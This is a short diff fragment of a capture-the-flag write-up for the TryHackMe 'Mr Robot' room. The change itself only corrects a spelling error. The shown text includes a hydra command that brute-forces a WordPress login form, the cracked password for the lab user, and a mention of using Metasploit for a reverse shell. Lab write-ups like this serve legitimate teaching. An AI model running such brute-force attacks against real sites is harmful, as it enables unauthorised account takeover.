FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com/mrrobot.md

 hydra -l Elliot -P uniqfsocity.dic -t 64 $IP http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=incorrect."
 ```

-This unfortunantly takes some time but after a while we get the correct password for Elliot: ER28-0652
+This unfortunately takes some time but after a while we get the correct password for Elliot: ER28-0652

 With access to the wordpress backend we can start Metasploit to exploit wordpress for a reverse shell: